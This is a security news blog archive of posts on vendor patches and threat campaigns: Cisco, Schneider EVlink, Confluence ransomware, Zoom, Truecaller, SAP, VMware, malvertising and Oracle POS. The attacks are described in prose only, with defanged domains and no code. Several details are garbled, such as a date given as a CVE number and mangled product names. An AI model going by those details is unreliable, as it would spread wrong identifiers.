Search This Blog

Showing posts with label Security patches. Show all posts

11 High-Severity Flaws in Security Products Patched by Cisco

 

This week, Cisco released its April 2022 bundle of security advisories for Cisco Adaptive Security Appliance (ASA), Firepower Threat Defense (FTD), and Firepower Management Center (FMC). 

The semiannual bundled advisories include a total of 19 flaws in Cisco security products, with 11 of them being classified as "high severity." 

CVE-2022-20746 (CVSS score of 8.8) is the most serious of these, an FTD security vulnerability that occurs because TCP flows aren't appropriately handled and might be exploited remotely without authentication to generate a denial of service (DoS) condition. 

“An attacker could exploit this vulnerability by sending a crafted stream of TCP traffic through an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition,” Cisco explains in an advisory. 

With the introduction of FDT versions 6.6.5.2 and 7.1.0.1, the IT giant has addressed the problem. Fixes will also be included in FDT releases 6.4.0.15 and 7.0.2, which will be released next month. Several more DoS vulnerabilities, all rated "high severity," were fixed with the same FDT releases, including ones that affect ASA as well. They were addressed in ASA releases 9.12.4.38, 9.14.4, 9.15.1.21, 9.16.2.14, and 9.17.1.7. Other problems fixed by these software upgrades could result in privilege escalation or data manipulation when using an IPsec IKEv2 VPN channel.

Cisco also fixed an ASA-specific flaw that allowed an attacker to access sensitive information from process memory. Firepower Management Center (FMC) releases 6.6.5.2 and 7.1.0.1, as well as the future releases 6.4.0.15 and 7.0.2, resolve a remotely exploitable security protection bypass flaw, as per the tech giant. 

Cisco stated, “An attacker could exploit this vulnerability by uploading a maliciously crafted file to a device running affected software. A successful exploit could allow the attacker to store malicious files on the device, which they could access later to conduct additional attacks, including executing arbitrary code on the affected device with root privileges."

Fixes for eight medium-severity vulnerabilities in these security products are included in the company's semiannual bundled publishing of security advisories. Cisco is not aware of any attacks that take advantage of these flaws.

New Vulnerabilities Expose EVlink Electric Vehicle Charging Stations to Remote Hacking

 

Schneider Electric confirmed the discovery and patching of multiple vulnerabilities in EVlink EV charging stations, which might expose these deployments to hostile hackers, in a security advisory. 

The flaws are found in the EVlink City (EVC1S22P4 and EVC1S7P4), Parking (EVW2, EVF2, and EVP2PE), and Smart Wallbox (EVB1A) equipment, as well as other items that will be terminated. 

Cross-site request forgery (CSRF) and cross-site scripting (XSS) flaws stand out among the vulnerabilities addressed, both of which could be used to launch actions impersonating legitimate users; additionally, a vulnerability was addressed that could give attackers complete access to charging stations via brute force attacks. 

According to the Common Vulnerability Scoring System, the most serious vulnerability obtained a score of 9.3/10. (CVSS). The firm warns that exploiting the major issue could result in serious consequences. 

Schneider’s notice stated, “Malicious manipulation of charging stations could lead to denial of service (DoS) attacks, deregistration, and disclosure of sensitive information.” 

The majority of these flaws require physical access to the system's internal communication ports, while some more sophisticated assaults can be carried out remotely over the Internet. The vulnerabilities entail sending specially crafted queries, according to Tony Nasr, the researcher who first disclosed the flaws, and exploitation does not require interaction from vulnerable users. 

“Attacks allow threat actors to exploit compromised EVCS in a similar way to the operation of a botnet, allowing the deployment of various attacks.” 

Exploiting the CSRF and XSS vulnerabilities, on the other hand, necessitates a certain level of user engagement. While Internet-oriented EVlink implementations are the most dangerous attack vector, cybercriminals might still pose a serious security risk to these stations over LAN, as the EVlink configuration needs network connectivity for remote control and more efficient management. 

Nasr concluded by stating that these flaws were discovered as part of a larger research on charging station management systems for electric vehicles. The study's full findings will be released in the coming months.

Cisco Releases Patches for Several High Severity Vulnerabilities

 

This week, Cisco addressed a number of high-severity flaws in its Web Security Appliance (WSA), Intersight Virtual Appliance, Small Business 220 switches, and other products. If all of these issues are successfully exploited, attackers may be able to cause a denial of service (DoS), perform arbitrary commands as root, as well as obtain administrator rights. 

Two high-severity vulnerabilities (CVE-2021-34779 and CVE-2021-34780) were discovered within the implementation of the Link Layer Discovery Protocol (LLDP) for Small Business 220 series smart switches, allowing arbitrary code execution and a denial of service condition. The business switch series software update additionally fixes four medium-severity security issues that could cause LLDP storage destruction on a vulnerable device. 

Inadequate input validation inside the Intersight Virtual Appliance is another serious flaw. The security vulnerability, identified as CVE-2021-34748, could allow arbitrary instructions to be executed with root rights. 

Cisco further patched two high-severity flaws in its ATA 190 series and ATA 190 series multiplatform (MPP) software this week. The issues, identified as CVE-2021-34710 and CVE-2021-34735, might be used to execute malicious code and create a denial of service (DoS) scenario, accordingly. 

One of these flaws was disclosed to Cisco by firmware security company IoT Inspector, which published an alert on Thursday 7th of October, detailing its observations. 

Cisco has fixed a race issue in the AnyConnect Secure Mobility Client for Linux and macOS that could've been exploited to execute arbitrary code having admin rights, as well as an inappropriate memory management vulnerability in AsyncOS for Web Security Appliance (WSA) that might result in DoS. 

CVE-2021-1594, an inadequate input validation vulnerability in the REST API of Cisco Identity Services Engine, is yet another high-severity weakness patched this week (ISE). An intruder in a man-in-the-middle position might leverage the issue to execute arbitrary instructions with root access by decrypting HTTPS data between two ISE personas on different nodes. 

Cisco also provided fixes for TelePresence CE and RoomOS, Smart Software Manager On-Prem, 220 series business switches, Identity Services Engine, IP Phone software, Email Security Appliance (ESA), DNA Center, and Orbital, which all have moderate issues. However, Cisco has issued patches for all these flaws and claims that exploits for them have not been publicly revealed.

Confluence Servers are Being Targeted by the New Atom Silo Malware

 

A new ransomware operator is targeting Confluence servers, gaining initial access to susceptible systems by exploiting a recently reported vulnerability. According to Sean Gallagher and Vikas Singh of Sophos, the new threat actors, called Atom Silo, are exploiting the flaw in the hopes that Confluence server owners have yet to apply the essential security patches to fix the vulnerability. 

Atlassian Confluence is a web-based virtual workspace for businesses that allows teams to collaborate on projects and communicate. Atom Silo recently launched a two-day cyberattack, according to Sophos. The attackers were able to get initial access to the victim's corporate environment due to a vulnerability identified as CVE-2021-08-25. 

Atlassian released security fixes on August 25 to address a Confluence remote code execution (RCE) vulnerability that had been exploited in the wild and was tracked as CVE-2021-26084. They also discovered that the ransomware utilized by this new gang is nearly comparable to LockFile, which is quite similar to the LockBit malware.

Several innovative approaches that made it exceedingly difficult to examine, including the side-loading of malicious dynamic-link libraries targeted to disrupt endpoint protection software, according to Atom Silo operators. Following the compromise of Confluence servers and the installation of a backdoor, the threat actors use DLL side-loading to execute a second-stage stealthier backdoor on the compromised machine. 

"The incident investigated by Sophos shows how quickly the ransomware landscape can evolve. This ultra-stealthy adversary was unknown until a few weeks ago," said Sean Gallagher, a senior threat researcher at Sophos. "In addition, Atom Silo made significant efforts to evade detection prior to launching the ransomware, which included well-worn techniques used in new ways. Other than the backdoors themselves, the attackers used only native Windows tools and resources to move within the network until they deployed the ransomware." 

According to Sophos, ransomware operators and other malware authors are becoming increasingly competent at exploiting these flaws, latching on publicly available proof-of-concept exploits for freshly discovered vulnerabilities and weaponizing them quickly to benefit from them. 

"To reduce the threat, organizations need to both ensure that they have robust ransomware and malware protection in place, and are vigilant about emerging vulnerabilities on Internet-facing software products they operate on their networks," they added.

Cisco Published Two Critical and Six High-Severity Patches for Nexus Gear

 

The American multinational technology conglomerate corporation Cisco Systems, based in San Jose, California - has published six security patches for its high-end 9000 series networking gear, spanning in severity from critical, high, and medium. 

Cisco Systems designs, produce and distributes networking gear, software, telecom equipment, and a variety of other high-tech products and services. 

Cisco fixed one of the most critical flaws (ranked 9.1 out of 10) that might enable a hostile and unauthorized attacker to read or write arbitrary files on an application protocol interface used in Cisco 9000 series switches meant to operate its software-defined networking data center solutions. 

Cisco additionally patched two high-severity Nexus 9000 flaws (CVE-2021-1586 and CVE-2021-1523) as well as three medium-severity flaws (CVE-2021-1583, CVE-2021-1584, CVE-2021-1591). Each of the high-severity flaws (also with a CVSS base score of 8.6) are denial of service issues. 

The significant vulnerability, CVE-2021-1577, patched affects the Cisco Application Policy Infrastructure Controller (APIC) and the Cisco Cloud Application Policy Infrastructure Controller (Cloud APIC). APIC is the primary architectural element of the Cisco Application Centric Infrastructure, which is operated on a Cisco Nexus 9000 Series node.

In a variety of diminutive form factors, the Cisco Nexus 9000 Series combines established high performance and compactness, low latency, and outstanding power efficiency. They can run in either Cisco NX-OS Software or Application Centric Infrastructure (ACI) mode. They are suitable for both conventional and completely automated data center setups. 

Cisco describes a second high-severity Nexus 9000 series flaw as a loophole within the Fabric Switches ACI Mode Queue Wedge. 

“This vulnerability is due to improper access control. An attacker could exploit this vulnerability by using a specific API endpoint to upload a file to an affected device,” wrote Cisco in its Wednesday security bulletin. Affected products are Cisco APIC and Cisco Cloud APIC. 

Cisco stated that countermeasures are present for each of the flaws and that it is unaware of any widely available exploits for all those problems that have been fixed, as with all of the flaws and solutions published on Wednesday. The fix released on Wednesday 25th of August was included in the Cisco "bundled publication" of security improvements for its Firepower eXtensible Operating System and Linux kernel compatible NX-OS software. 

“A vulnerability in the Multi-Pod or Multi-Site network configurations for Cisco Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode could allow an unauthenticated, remote attacker to unexpectedly restart the device, resulting in a denial of service (DoS) condition,” wrote Cisco. 

Following the implementation of the patches, Cisco advises that the solution for this flaw needs “a manual intervention to power-cycle the device to recover.” Fabric switches from the generation 1 model N9K (Nexus 9000) series are the ones compromised.

Zoom Security Flaw: Now Hackers Can Take Control Of Your PC, Wait For Patch

 


Zoom security issues were lately troubling users worldwide, very often so. The Zoom video conferencing app was not in the limelight before the ongoing pandemic, however, since the inception of Covid-19, a lot has changed along with the ways of living, this was also the time when Zoom App underwent some regulatory security measures, owing to the suddenly enhanced reputation enjoyed by the app, as the work from home was necessitated by the pandemic. 

However, as of now, it is being observed that the security measures that had been taken a year ago are failing to secure users' data from threat actors.

Cybercriminals exploited a vulnerability and undertook a distant code execution (RCE) assault to take management of host PCs. The two Computest cyber safety intelligence observed the vulnerability on the Pwn2Own 2021 competition, organized by the Zero Day Initiative. The two Computest researchers Daan Keuter and Thijs Alkemade were awarded $200,000 for their findings. 

How does This work? 


Foremostly, the hacker has to be a part of the same organizational domain as the host PC’s user has to get permission from the host to join the meeting; When the attackers become part of a meeting, they will be able to execute a chain of three malware that will install an RCE backdoor on the victim’s PC. 

It can also be understood as — the threat actors can get access to your PC, and simultaneously will able to be able to implement remote commands that will then give access to your sensitive data.

Besides, what is even dangerous here is that the hackers can run their operations without the victim being required to do anything, therefore it is very essential to add more layers of security measures that can slow down the future operations of the attackers. 

The aforementioned operation runs on Mac, Windows, but on Zoom’s iOS and Android apps, it has not been checked yet. Notably, the browser version is safe. 

Currently, Zoom is yet to take measures, and the technical details of the attack have not been reported to the public, yet. Reportedly, the patch will arrive on Zoom for Mac and Windows within the next 90 days. 

Guardian: Truecaller Fixes Location Vulnerabilty In Its New App

Caller ID and spam blocking company Truecaller recently launched its "Guardian" application that allows users to share their live locations with the trusted guardians in their contact lists. Anand Prakash, cybersecurity expert based in Bangalore, however, pointed out that the app had a major vulnerability and Truecaller soon fixed it. The individual security app has an emergency option that informs the user's selected peers of his/her live location, which gives real-time information during any emergency.  Mr. Prakash who founded Pingsafe, a cybersecurity startup, says that the vulnerability could allow any potential threat actor to gain access into any user's account via using a phone number. 

Later, the hacker could hijack the user account and take all its data, this may include the live location (both user and emergency contacts), user date of birth, and profile picture. Guardian was released on 3rd March and has over 1,00,000 downloads on the play store. "We are using an encrypted line between the two different clients...So that actually means that you can't revisit a previous journey because we don't store that data...The data that is shared with the 'forever sharing' option is the state of battery and signal, along with the location to help the trusted guardians follow the user," says Truecaller. Mr. Prakash contacted Truecaller the next day, notifying the latter about the vulnerability. 

Basic API error was the reason for the flaw. If API (Application Programming Interfaces) problems persist, it allows attackers to access website data and software, generally not accessible to a user. Mr. Prakash says he immediately looked into the app after its release and soon discovered issues with the app. using the "login API" option in the app, the researcher was able to gain access to another person's profile using his phone number. 

A similar pattern was tried with other contacts and the issue was reported to Truecaller. The company soon fixed the issue and later notified the expert. Mr. Prakash identified the issue as an "Insecure Direct Object Interference" flaw.  PingSafe's report says, "companies tend to miss out on such fundamental issues even after rigorous security assessments. The repercussions of such problems are enormous and impact customers’ privacy and lead to companies’ revenue losses." 

SAP Issued Warning and Updates Regarding the Serious Flaws with the Code Injection

 

A German multinational software corporation SAP ( Systems Applications and Products in Data Processing ) is known for developing software solutions that work on managing business operations as well as customer relations. SAP is the name of their software as well as of the company that works on this technology. SAP provides “future-proof Cloud ERP (Enterprise Resource Planning) solutions that will power the next generation of business.” With its advanced capabilities, SAP can boost your organization's efficiency and productivity by automating repetitive tasks, making better use of your time, money, and resources. 

SAP has published some 14 new updates or the Security Note on the 2020 December Patch Day. Whereas in January 2021 they published another set of 7 new Security Notes, later providing their new updates as well. Five of the seven have the highest severity rate of the Hot News. Later in the month, they made a proclamation where they published 10 advisories to a document of flaws ad fixes for a range of serious security vulnerabilities. In the congregation of asserted vulnerabilities, the most important issue bears a CVSS score of 9.9 in the SAP Business Warehouse. 

 The very first note addressed CVE-2021-21465 which according to SAP is multiple issues in the Database Interface. These bugs are an SQL Injection with a missing authorization check which should have featured a CVSS score of 6.5. A SQL Injection is basically a code injection technique that might at times destroy the database interface. One of the most common hacking technique used by hackers is SQL Injection. In the SQL Injection, another thing that was missing was Onapsis, a firm that secures Oracle and SAP applications. These missing authorization checks would easily exploit to read any table of a database. 

 Mentioning that minimum privileges are required for successful exploitation, Onapsis in a blog quoted, “An improper sanitization of provided SQL commands allowed an attacker to execute arbitrary SQL commands on the database which could lead to a full compromise of the affected system,” SAP decided to fix such bugs b disabling the function module and applying the patches that will result in abandoning of all the applications that call this function module. 

 Another serious issue, other than the aforementioned issue, is a code injection flaw in both Business Warehouse and BW/4H4NA , that addresses as CVE-2021-21466. This issue is a result of insufficient input validation. Such flaws are misused to inject malicious code that gets stored persistently as a repot. These issues potentially affect the confidentiality, integrity, and availability of systems. The remaining three from the total five updates are fixes for the programs released in 2018 and 2020. 

 Further SAP added as a warning, “An issue in the binding process of the Central Order service to a Cloud Foundry application” that could have allowed “unauthorized SAP employees to access the binding credentials of the service”.

NSA Issued Warning Against Russian State-Sponsored Attackers for Exploiting VMware Access

An advisory warning has been issued by the United States National Security Agency (NSA) on 7th December that Russian malicious actors are posing a big threat to VMware by installing malware on corporate systems and accessing protected data. 
The attack came two weeks after the virtualization software company publicly disclosed vulnerabilities. According to the company malicious actor (s) is accessing —VMware workspace one, Connector, Identity Manager, and Identity Manager Connector products for Windows and Linux. However, the identities of malicious actors and when all of this started have not been disclosed. 

What is VMware? 

VMware is an American Software Company that provides cloud computing and virtualization software and services. VMware was one of the commercially successful companies to virtualize the x86 architecture.

Its desktop software runs on Microsoft Windows, Linux, and macOS, while its enterprise software hypervisor for servers, VMware ESXi, is a bare-metal hypervisor that runs directly on server hardware without requiring an additional underlying operating system. 

When The Threat Surfaced? 

It was about in late November when Vmware had addressed the attacking threat and pushed temporary workarounds to dig deeper into the issue. However, the ‘escalation-of-privileges ‘bug resolution had to wait till the 3rd of December 2020 to get resolved. 

The same day witnessed the United States Cybersecurity and Infrastructure Security Agency (CISA) releasing a brief bulletin to encourage administrators to review, apply, and patch as soon as possible.

Meanwhile, as per the National Security Advisor, VMware didn’t clearly disclose that the bug was being actively exploited by the attackers, which led to adversaries leveraging the vulnerability for launching attacks to steal data and exploit shared authentication systems. 

''The misuse via shell injection led to the installation of a web shell and follow up malicious activity where Security Assertion Markup Language (SAML) in the form of authentication assertions generated and sent to Microsoft Active Directory Federation Services, which allow actors access to protected data," the agency said. 

What is SAML? 

Security Assertion Markup Language or SAML an Open standard for exchanging authentication and authorization data between parties, in particular, between an identity provider and a service provider. SAML is an XML-based markup language for security assertions (statements that service providers use to make access-control decisions). 

Besides insisting on the organizations to update compromised systems to the latest version, the agency is also moving forward towards securing strong management. 

As of now, the threat hasn’t gone anywhere; the US National Security Advisory has advised the agencies to monitor all the systems, scan server logs for the presence of "exit statements" that indicate possible malicious activity. 

Attention! Malvertising Campaigns Using Exploit Kits On The Rise


Of all the things that online advertising could be used for, spreading malware is the one that throws you off the list by surpassing them all.

Not of late, researchers found out a recent ‘Malvertising’ campaign and sources say that it was done by way of the “Domen Social Engineering Toolkit”.
‘Malvertising’ (malicious advertising) could be defined as using online advertising means for spreading malware. Most typically it is done by inserting malware or malicious advertisements into legitimate advertising web pages or networks.

Per informed sources, this campaign was uncovered while trying to influence a VPN service as bait. It displayed a group of domains that gave Domen’s attack mechanism a fresh bend.

The construction of the campaign, as mentioned in reports, was such that ‘search-one[.]info’ was comprised in it as the ‘fake’ page, ‘mix-world[.]best’ as the download site and ‘panel-admin[.]best as the backend panel.

As revealed in reports, the campaign managed to redirect the users and bare them to ‘Smoke Loader’. This is conceivably a downloader that installs secondary payloads. And that’s what it did. They consisted of a ‘Vidar stealer’, ‘Buran ransomware’ and ‘IntelRapid cryptominer’.

Need not to mention, this campaign isn’t the first one to surface which was focused on payloads. Women's malvertising per source had commenced in September last year. The social engineering toolkit was employed to exploit the website and fool users into clicking on a fake ‘Adobe Flash Player’ update. The clicking would start a download of “download.hta”. Afterward, by way of employing PowerShell to connect to “xyxyxyxyxy[.]xyz”, only to download the 'NetSupport Remote Access Trojan' (RAT), later.

With amplification in the usage of the internet and online means, it becomes a top priority to build up a structured and strong defense mechanism to fight and prevent Malvertising.

Hiring security professionals is a safe pre-requisite and a building block towards creating the defense structure. Keeping abreast of the latest updates and patches must be a primary priority.

Word has it that in most cases the ‘exploit kits’ are employed to disseminate the malware payloads. Hence the organizations should have a clear account of all its obstruction points so that Malvertising campaign’s attack payloads could be detected and dealt with in time.

Security Flaw in Oracle POS systems discovered

Researchers at ERPScan have discovered a new security flaw in the Oracle Micros Point-of-Sale (POS) systems that has left over 300,000 systems vulnerable to attack from hackers.

It was discovered in September 2017 by Dmitry Chastuhin, a security researcher, and was named “CVE-2018-2636”.

Oracle has already issued updates for this issue earlier in the month but due to companies’ fear of unstable patches and losses, it is suspected that it may take months for the patch to reach affected systems.

According to Chastuhin, the POS malware enables hackers to collect configuration files from the systems and gain access to the server.

Hackers can also exploit the flaw remotely using carefully crafted HTTP requests. Many of the vulnerable systems have already been misconfigured to allow such access and are available online to be easily exploited if the patches aren’t used soon.

Patches for the flaw were made available in January 2018 in Oracle’s Critical Patch Update (CPU). More information on the bug can be found here.

Microsoft provides urgent security fix for Windows

Microsoft has recently provided a security fix for its Windows operating systems to plug a lapse in security that allowed hackers access to a victims computer.

Microsoft has said that the vulnerability present in their operating system would have allowed a hacker to gain complete access to an affected computer.

The vulnerability is present in Windows Vista, Windows 7, Windows 8 and 8.1 and Windows RT. These operating systems represent two out of three computers in the world that run a Microsoft operating system.

The company had previously provided an update like this in November 2014 also.

The flaw is said to exist in the final version of Windows 10 also that will be available to users from July 29.

The security fix will be done through Windows Update